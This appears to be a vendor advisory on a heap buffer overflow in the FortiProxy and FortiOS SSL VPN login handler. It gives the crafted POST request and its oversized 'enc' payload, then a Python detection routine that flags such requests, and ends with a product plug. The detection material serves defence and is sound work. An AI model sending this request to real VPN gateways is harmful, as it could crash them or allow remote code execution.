Appliance Details
FortiProxy is a web gateway that provides multiple detection techniques against internet-based attacks.
FortiOS is an operating system utilised to deploy and enforce security policies, and enable centralized management across the entire distributed network.
Vulnerability
Fortinet FortiProxy and FortiOS are vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the SSL VPN function.
Identification
By sending specially crafted requests, a remote attacker could overflow a buffer and execute arbitrary code on the system.
POST /remote/logincheck HTTP/1.1
PAYLOAD - ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Detection
By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to overflow a buffer and execute arbitrary code on the system.
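A minimal sketch of the kind of matching logic described above, added here as an example; it is not Idappcom's signature 8023945 or its traffic file. The length and repetition thresholds, the helper names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed thresholds for this sketch; tune them against real login traffic.
MAX_ENC_LEN = 128   # enc values longer than this are flagged
MAX_RUN_LEN = 32    # one character repeated this many times is flagged
RUN_RE = re.compile(r"(.)\1{%d,}" % (MAX_RUN_LEN - 1))


def inspect_request(raw: str) -> list[str]:
    """Return the reasons a raw HTTP request resembles the overflow attempt."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0].split(" ")
    if len(request_line) < 2:
        return []  # not a parseable request line
    method, target = request_line[0], request_line[1]
    path, _, query = target.partition("?")
    if method.upper() != "POST" or path.rstrip("/") != "/remote/logincheck":
        return []
    reasons = []
    # Check enc whether it arrives in the form body or the query string.
    for source in (body, query):
        for enc in parse_qs(source, keep_blank_values=True).get("enc", []):
            if len(enc) > MAX_ENC_LEN:
                reasons.append(f"enc length {len(enc)} exceeds {MAX_ENC_LEN}")
            if RUN_RE.search(enc):
                reasons.append(f"enc repeats one character {MAX_RUN_LEN}+ times")
    return reasons


def build(body: str, path: str = "/remote/logincheck") -> str:
    """Build a constructed sample request (host name is a placeholder)."""
    return (f"POST {path} HTTP/1.1\r\nHost: vpn.example.test\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


# Constructed samples: an ordinary login and an oversized enc parameter.
BENIGN = build("ajax=1&username=test&realm=&credential=secret")
SUSPECT = build("ajax=1&username=test&realm=&credential=&enc=00000000" + "a" * 400)
OTHER_PATH = build("enc=" + "a" * 400, path="/remote/login")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req))
```

The check runs before authentication is evaluated, so it also catches requests with empty credentials such as the one shown above.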
Coverage
Idappcom has created signature 8023945 along with a corresponding traffic file.
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional